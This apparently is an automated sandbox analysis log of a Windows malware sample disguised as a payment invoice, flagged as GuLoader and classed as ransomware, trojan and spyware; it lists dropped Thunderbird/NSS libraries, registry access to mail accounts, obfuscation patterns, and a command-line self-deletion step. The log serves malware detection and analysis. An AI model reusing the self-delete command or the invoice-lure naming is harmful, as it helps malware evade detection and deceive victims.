Source: api-ms-win-core-processthreads-l1-1-1.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000000.251809754.000000000041E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000000.539833282.000000000041E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862316814.000000006EA8B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862415894.000000006F6D2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Binary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
PE file contains strange resources
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file contains more sections than normal
Source: sqlite3.dll.24.dr Static PE information: Number of sections : 18 > 10
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Virustotal: Detection: 28%
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@8/69@3/4
Source: softokn3.dll.24.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862147868.000000006EA50000.00000002.00020000.sdmp, nss3.dll.24.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.24.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.24.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.24.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.24.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862147868.000000006EA50000.00000002.00020000.sdmp, nss3.dll.24.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862147868.000000006EA50000.00000002.00020000.sdmp, nss3.dll.24.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.24.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862147868.000000006EA50000.00000002.00020000.sdmp, nss3.dll.24.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.24.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Mutant created: \Sessions\1\BaseNamedObjects\user987uh4b36teeorinthj
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_01
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.24.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.24.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.24.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.24.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.24.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.24.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.24.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.24.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.24.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.24.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.24.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.24.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.24.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.24.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.24.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.24.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.24.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.24.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.24.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.24.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.24.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.24.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.24.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.24.dr

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.541230200.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00417BB0 push dword ptr [edi+000000BCh]; ret 0_2_004185BC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00406E76 push 31716A05h; retf 0_2_00406E7B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00405A07 push ebx; iretd 0_2_00405A09
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00404430 pushfd ; retf 0_2_00404432
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004064DA push esi; ret 0_2_004064E5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_0040708F push ebx; iretd 0_2_00407091
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004052A7 push ebx; iretd 0_2_004052A9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00404F7C push es; iretd 0_2_00404F7D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00405F08 push es; iretd 0_2_00405F09
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_0040392D push esi; ret 0_2_00403934
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004063CF push ebx; iretd 0_2_004063D1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_00406FD7 push ebx; iretd 0_2_00406FD9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004039AE push ds; iretd 0_2_004039DF
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_004069B4 push es; iretd 0_2_004069B5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB86B push ebx; ret 0_2_022FB86D
PE file contains sections with non-standard names
Source: sqlite3.dll.24.dr Static PE information: section name: /4
Source: sqlite3.dll.24.dr Static PE information: section name: /19
Source: sqlite3.dll.24.dr Static PE information: section name: /31
Source: sqlite3.dll.24.dr Static PE information: section name: /45
Source: sqlite3.dll.24.dr Static PE information: section name: /57
Source: sqlite3.dll.24.dr Static PE information: section name: /70
Source: sqlite3.dll.24.dr Static PE information: section name: /81
Source: sqlite3.dll.24.dr Static PE information: section name: /92
Source: AccessibleHandler.dll.24.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.24.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.24.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.24.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.24.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.24.dr Static PE information: section name: .orpc
Source: mozglue.dll.24.dr Static PE information: section name: .didat
Source: msvcp140.dll.24.dr Static PE information: section name: .didat
Binary contains a suspicious time stamp
Source: ucrtbase.dll.24.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.12774451895

Persistence and Installation Behavior:

Creates processes with suspicious names
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: \usd15.030 payment copy & signed invoice september 2021 shipment.exe
Drops PE files
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\MapiProxy.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\libEGL.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ldap60.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozglue.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\freebl3.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ldif60.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\qipcap.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\vcruntime140.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\msvcp140.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\IA2Marshal.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
